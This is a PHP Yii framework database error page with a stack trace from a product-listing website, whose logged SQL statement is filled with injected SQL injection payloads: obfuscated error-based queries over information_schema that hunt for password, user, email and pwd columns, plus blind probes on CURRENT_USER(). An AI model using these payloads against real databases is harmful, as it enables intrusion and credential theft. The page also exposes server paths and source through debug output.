CDbException
CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'ORDER*/ /*!00000BY*/ 1#','2','283','284','285','286','287' and(/**/sElEcT 1 /...' at line 1. The SQL statement executed was: SELECT `t`.`id` AS `t0_c0`, `t`.`name` AS `t0_c1`, `t`.`description` AS `t0_c2`, `t`.`content` AS `t0_c3`, `t`.`manufacturer` AS `t0_c4`, `t`.`user_id` AS `t0_c5`, `t`.`module_id` AS `t0_c6`, `t`.`module2_id` AS `t0_c7`, `t`.`module3_id` AS `t0_c8`, `t`.`module4_id` AS `t0_c9`, `t`.`module5_id` AS `t0_c10`, `t`.`listing_id` AS `t0_c11`, `t`.`listing_draft_id` AS `t0_c12`, `t`.`category_id` AS `t0_c13`, `t`.`brand_id` AS `t0_c14`, `t`.`layout_id` AS `t0_c15`, `t`.`product_category_id` AS `t0_c16`, `t`.`category` AS `t0_c17`, `t`.`category_proposition` AS `t0_c18`, `t`.`contact` AS `t0_c19`, `t`.`phone` AS `t0_c20`, `t`.`mobile` AS `t0_c21`, `t`.`fax` AS `t0_c22`, `t`.`email` AS `t0_c23`, `t`.`website` AS `t0_c24`, `t`.`address` AS `t0_c25`, `t`.`address_addition` AS `t0_c26`, `t`.`city_id` AS `t0_c27`, `t`.`map_latitude` AS `t0_c28`, `t`.`map_longitude` AS `t0_c29`, `t`.`price` AS `t0_c30`, `t`.`promotion_price` AS `t0_c31`, `t`.`promotion_reduction` AS `t0_c32`, `t`.`council_price` AS `t0_c33`, `t`.`council_reduction` AS `t0_c34`, `t`.`rates` AS `t0_c35`, `t`.`initial_stock` AS `t0_c36`, `t`.`stock` AS `t0_c37`, `t`.`sell_type_id` AS `t0_c38`, `t`.`tax_id` AS `t0_c39`, `t`.`highlight_id` AS `t0_c40`, `t`.`video_url` AS `t0_c41`, `t`.`podcast_url` AS `t0_c42`, `t`.`buy_url` AS `t0_c43`, `t`.`allowed_images` AS `t0_c44`, `t`.`allowed_videos` AS `t0_c45`, `t`.`rating` AS `t0_c46`, `t`.`rating_count` AS `t0_c47`, `t`.`recommendation` AS `t0_c48`, `t`.`access_count` AS `t0_c49`, `t`.`redirect_count` AS `t0_c50`, `t`.`comment` AS `t0_c51`, `t`.`rank` AS `t0_c52`, `t`.`to_delete` AS `t0_c53`, `t`.`has_price_from_label` AS `t0_c54`, `t`.`has_invoice` AS `t0_c55`, `t`.`is_salable` AS `t0_c56`, `t`.`is_product` AS `t0_c57`, `t`.`is_highlight` AS `t0_c58`, `t`.`is_search_highlight` AS `t0_c59`, `t`.`is_promotion` AS `t0_c60`, `t`.`is_council_promotion` AS `t0_c61`, `t`.`is_featured` AS `t0_c62`, `t`.`is_validated` AS `t0_c63`, `t`.`is_indexed` AS `t0_c64`, `t`.`is_active` AS `t0_c65`, `t`.`reference` AS `t0_c66`, `t`.`highlight_end_date` AS `t0_c67`, `t`.`search_highlight_end_date` AS `t0_c68`, `t`.`created_by` AS `t0_c69`, `t`.`created_date` AS `t0_c70`, `t`.`modified_by` AS `t0_c71`, `t`.`modified_date` AS `t0_c72`, `t`.`validity_end_date` AS `t0_c73`, `t`.`sell_end_date` AS `t0_c74`, `t`.`promotion_end_date` AS `t0_c75`, `t`.`promotion_begin_date` AS `t0_c76`, `listing`.`id` AS `t1_c0`, `listing`.`sell_end_date` AS `t1_c1`, `listing`.`code` AS `t1_c2`, `listing`.`name` AS `t1_c3`, `listing`.`short_name` AS `t1_c4`, `listing`.`description` AS `t1_c5`, `listing`.`content` AS `t1_c6`, `listing`.`user_id` AS `t1_c7`, `listing`.`module_id` AS `t1_c8`, `listing`.`module2_id` AS `t1_c9`, `listing`.`module3_id` AS `t1_c10`, `listing`.`module4_id` AS `t1_c11`, `listing`.`module5_id` AS `t1_c12`, `listing`.`category_id` AS `t1_c13`, `listing`.`header_image_id` AS `t1_c14`, `listing`.`layout_id` AS `t1_c15`, `listing`.`listing_draft_id` AS `t1_c16`, `listing`.`listing_category_id` AS `t1_c17`, `listing`.`category_old` AS `t1_c18`, `listing`.`category_proposition` AS `t1_c19`, `listing`.`contact` AS `t1_c20`, `listing`.`phone` AS `t1_c21`, `listing`.`mobile` AS `t1_c22`, `listing`.`fax` AS `t1_c23`, `listing`.`email` AS `t1_c24`, `listing`.`website` AS `t1_c25`, `listing`.`address` AS `t1_c26`, `listing`.`address_addition` AS `t1_c27`, `listing`.`postal_code` AS `t1_c28`, `listing`.`city_id` AS `t1_c29`, `listing`.`map_latitude` AS `t1_c30`, `listing`.`map_longitude` AS `t1_c31`, `listing`.`video_url` AS `t1_c32`, `listing`.`podcast_url` AS `t1_c33`, `listing`.`opening_times` AS `t1_c34`, `listing`.`monday_begin` AS `t1_c35`, `listing`.`monday_end` AS `t1_c36`, `listing`.`tuesday_begin` AS `t1_c37`, `listing`.`tuesday_end` AS `t1_c38`, `listing`.`allowed_videos` AS `t1_c39`, `listing`.`rating` AS `t1_c40`, `listing`.`rating_count` AS `t1_c41`, `listing`.`recommendation` AS `t1_c42`, `listing`.`access_count` AS `t1_c43`, `listing`.`comment` AS `t1_c44`, `listing`.`rank` AS `t1_c45`, `listing`.`to_delete` AS `t1_c46`, `listing`.`is_product` AS `t1_c47`, `listing`.`is_highlight` AS `t1_c48`, `listing`.`is_search_highlight` AS `t1_c49`, `listing`.`is_promotion` AS `t1_c50`, `listing`.`is_featured` AS `t1_c51`, `listing`.`is_validated` AS `t1_c52`, `listing`.`is_indexed` AS `t1_c53`, `listing`.`is_active` AS `t1_c54`, `listing`.`reference` AS `t1_c55`, `listing`.`created_by` AS `t1_c56`, `listing`.`created_date` AS `t1_c57`, `listing`.`modified_email` AS `t1_c58`, `listing`.`modified_by` AS `t1_c59`, `listing`.`modified_date` AS `t1_c60`, `listing`.`allowed_images` AS `t1_c61`, `listing`.`wednesday_begin` AS `t1_c62`, `listing`.`wednesday_end` AS `t1_c63`, `listing`.`thursday_begin` AS `t1_c64`, `listing`.`thursday_end` AS `t1_c65`, `listing`.`friday_begin` AS `t1_c66`, `listing`.`friday_end` AS `t1_c67`, `listing`.`saturday_begin` AS `t1_c68`, `listing`.`saturday_end` AS `t1_c69`, `listing`.`sunday_begin` AS `t1_c70`, `listing`.`sunday_end` AS `t1_c71`, `listing`.`highlight_end_date` AS `t1_c72`, `listing`.`highlight_id` AS `t1_c73`, `listing`.`search_highlight_end_date` AS `t1_c74`, `listing`.`sell_type_id` AS `t1_c75` FROM `product` `t` LEFT OUTER JOIN `listing` `listing` ON (`t`.`listing_id`=`listing`.`id`) WHERE ( (t.city_id IN ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','23','24','26','28','29','30','31','32','33','34','35','36','37') OR listing.city_id IN ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','23','24','26','28','29','30','31','32','33','34','35','36','37')) AND t.category_id IN ('282' /*!00000ORDER*/ /*!00000BY*/ 1#','2','283','284','285','286','287' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x2570617373776f726425 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','288','289','290','291','292','293','294','295','296','297','298','299','300','301','302','303','304','305','306','307','308','309','310','311','312','313','314','315','316','317','318','319','320','322','323','324','325','326','327','328','329','330','331','332','333','334','335','336','337','338','339','340','341','342','343','344','345','346','347','348','349','350','351','352','353','354','355','356','357','358','359','360','361','362','363','364' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x257573657225 and not t./**/tAbLe_nAmE in(0x61646472657373,0x61727469636c655f6368616e676564,0x61727469636c655f636f707931,0x636f6d7065746974696f6e5f73756273637269626572,0x6372656469745f7472616e73616374696f6e,0x6469726563746f72795f656e7472795f6472616674,0x6661766f726974,0x666565645f737562736372697074696f6e,0x6a6f625f6164,0x6c697374696e675f6472616674,0x6c697374696e675f666565646261636b,0x6f72646572,0x70726f64756374,0x70726f647563745f70726963655f616c657274,0x73686f705f61727469636c65,0x75736572,0x757365725f707265666572656e6365,0x76656869636c655f6164,0x77656273697465) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 32,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','365','366','367','368','648','649','650' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x25656d61696c25 and not t./**/tAbLe_nAmE in(0x616e6e75616972655f70726f,0x636f6d7065746974696f6e5f73756273637269626572,0x6469726563746f72795f656e747279,0x656d61696c5f45524943,0x666565646261636b,0x6c697374696e67,0x6c697374696e675f6472616674,0x6c697374696e675f4f524947494e414c,0x6e6577736c65747465725f73756273637269626572,0x6f726465725f696e766f696365,0x70726f64756374,0x7265736572766174696f6e,0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 17,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','369' AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),25,1))>115-- JbRz','370','371','372','373','374','375','376','377','378','379','380' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x257061737325 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','381' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x257061737325 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','382' and 999 and '1'='1','383','384','385','386','387','388','389','390','391','392','393','394' AND (8412=8412)*4609 AND 'ayHk' LIKE 'ayHk','395','396','397','398','399','400','401','402','410','411','412','413','414','415','416','417','418','419','420','421','422','423','424','425','426','427','428' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x256d6f7425 and not t./**/tAbLe_nAmE in(0x6469726563746f72795f656e747279,0x6c697374696e67,0x6c697374696e675f6472616674,0x6c697374696e675f4f524947494e414c,0x6d6f64756c655f636f7079,0x706f7274616c5f626c6f63,0x70726f647563745f636f7079,0x737562736372697074696f6e) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 11,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','429','430','431','432','433','434','435' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x257573657225 and not t./**/tAbLe_nAmE in(0x61646472657373,0x61727469636c65,0x61727469636c655f636f7079,0x61727469636c655f6472616674,0x636f6d7065746974696f6e5f73756273637269626572,0x6372656469745f7472616e73616374696f6e,0x6469726563746f72795f656e7472795f6472616674,0x6661766f726974,0x666565645f737562736372697074696f6e,0x6a6f625f6164,0x6c697374696e675f6472616674,0x6c697374696e675f666565646261636b,0x6f72646572,0x70726f64756374,0x70726f647563745f70726963655f616c657274,0x73686f705f61727469636c65,0x75736572,0x757365725f707265666572656e6365,0x76656869636c655f6164,0x77656273697465) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 31,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','436','437','438','439','440','441','442','443','444','445','446','447','448','449','450','451','452','453','454','455','456','457' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x257061737325 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','458','459','460','461','462','463','464','465','466','467','468','469','470' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,d./**/sChEmA_NaMe,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and c./**/cOlUmN_NaMe like 0x2570776425 and not t./**/tAbLe_nAmE in(0x61646d696e5f75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','471','472','473','474','475','476','477','478' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x257573657225 and not t./**/tAbLe_nAmE in(0x61646472657373,0x61727469636c655f6368616e676564,0x61727469636c655f636f707931,0x636f6d7065746974696f6e5f73756273637269626572,0x6372656469745f7472616e73616374696f6e,0x6469726563746f72795f656e7472795f6472616674,0x6661766f726974,0x666565645f737562736372697074696f6e,0x6a6f625f6164,0x6c697374696e675f6472616674,0x6c697374696e675f666565646261636b,0x6f72646572,0x70726f64756374,0x70726f647563745f70726963655f616c657274,0x73686f705f61727469636c65,0x75736572,0x757365725f707265666572656e6365,0x76656869636c655f6164,0x77656273697465) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 32,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','479' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x2570617373776f726425 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','480','481','482','483','484','485','486','487','488','489','490','491','492','493','494','495','496','497','498','499','500','501','502' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x2570617373776f726425 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','503','504','505','506','507','508','509','510','511','512' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x2570617373776f726425 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','513','514','515','516','517','518','519','520','521','522','523','524','525','526','527','528','529','530','531','532','533','534','535' and 'x'='x','536','537','538','539','540','541','542','543','544','545','546','547','548','549','550','551' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x2570617373776f726425 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','552','553','554','555','556','557','558','559','560','561' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x257061737325 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','562','563','564','565','672','574','575','671') AND t.is_active='1') ORDER BY t.created_date DESC, CASE WHEN (t.price is NOT NULL OR t.price>'0.00') THEN 1 ELSE 2 END,`t`.rank DESC, RAND() LIMIT 15
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/db/CDbCommand.php(543)
531 {
532 if($this->_connection->enableProfiling)
533 Yii::endProfile('system.db.CDbCommand.query('.$this->getText().$par.')','system.db.CDbCommand.query');
534
535 $errorInfo=$e instanceof PDOException ? $e->errorInfo : null;
536 $message=$e->getMessage();
537 Yii::log(Yii::t('yii','CDbCommand::{method}() failed: {error}. The SQL statement executed was: {sql}.',
538 array('{method}'=>$method, '{error}'=>$message, '{sql}'=>$this->getText().$par)),CLogger::LEVEL_ERROR,'system.db.CDbCommand');
539
540 if(YII_DEBUG)
541 $message.='. The SQL statement executed was: '.$this->getText().$par;
542
543 throw new CDbException(Yii::t('yii','CDbCommand failed to execute the SQL statement: {error}',
544 array('{error}'=>$message)),(int)$e->getCode(),$errorInfo);
545 }
546 }
547
548 /**
549 * Builds a SQL SELECT statement from the given query specification.
550 * @param array $query the query specification in name-value pairs. The following
551 * query options are supported: {@link select}, {@link distinct}, {@link from},
552 * {@link where}, {@link join}, {@link group}, {@link having}, {@link order},
553 * {@link limit}, {@link offset} and {@link union}.
554 * @throws CDbException if "from" key is not present in given query parameter
555 * @return string the SQL statement
Stack Trace
#0 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/db/CDbCommand.php(396): CDbCommand-> queryInternal("fetchAll", array(2), array())
391 * An empty array is returned if the query results in nothing.
392 * @throws CException execution failed
393 */
394 public function queryAll($fetchAssociative=true,$params=array())
395 {
396 return $this->queryInternal('fetchAll',$fetchAssociative ? $this->_fetchMode : PDO::FETCH_NUM, $params);
397 }
398
399 /**
400 * Executes the SQL statement and returns the first row of the result.
401 * This is a convenient method of {@link query} when only the first row of data is needed.
|
#1 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/db/ar/CActiveFinder.php(803): CDbCommand-> queryAll()
798 * @param CJoinQuery $query the query to be executed.
799 */
800 public function runQuery($query)
801 {
802 $command=$query->createCommand($this->_builder);
803 foreach($command->queryAll() as $row)
804 $this->populateRecord($query,$row);
805 }
806
807 /**
808 * Populates the active records with the query data.
|
#2 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/db/ar/CActiveFinder.php(437): CJoinElement-> runQuery(CJoinQuery)
432 {
433 $query=new CJoinQuery($this,$criteria);
434 $this->_finder->baseLimited=($criteria->offset>=0 || $criteria->limit>=0);
435 $this->buildQuery($query);
436 $this->_finder->baseLimited=false;
437 $this->runQuery($query);
438 }
439 elseif(!$this->_joined && !empty($this->_parent->records)) // not joined before
440 {
441 $query=new CJoinQuery($this->_parent);
442 $this->_joined=true;
|
#3 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/db/ar/CActiveFinder.php(68): CJoinElement-> find(CDbCriteria)
63 {
64 $this->_joinTree->tableAlias=$criteria->alias;
65 $this->_joinTree->rawTableAlias=$this->_builder->getSchema()->quoteTableName($criteria->alias);
66 }
67
68 $this->_joinTree->find($criteria);
69 $this->_joinTree->afterFind();
70
71 if($all)
72 {
73 $result = array_values($this->_joinTree->records);
|
#4 |
+
–
/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/db/ar/CActiveRecord.php(1356): CActiveFinder-> query(CDbCriteria, true)
1351 return $all ? $this->populateRecords($command->queryAll(), true, $criteria->index) : $this->populateRecord($command->queryRow());
1352 }
1353 else
1354 {
1355 $finder=$this->getActiveFinder($criteria->with);
1356 return $finder->query($criteria,$all);
1357 }
1358 }
1359
1360 /**
1361 * Applies the query scopes to the given criteria.
|
#5 |
+
–
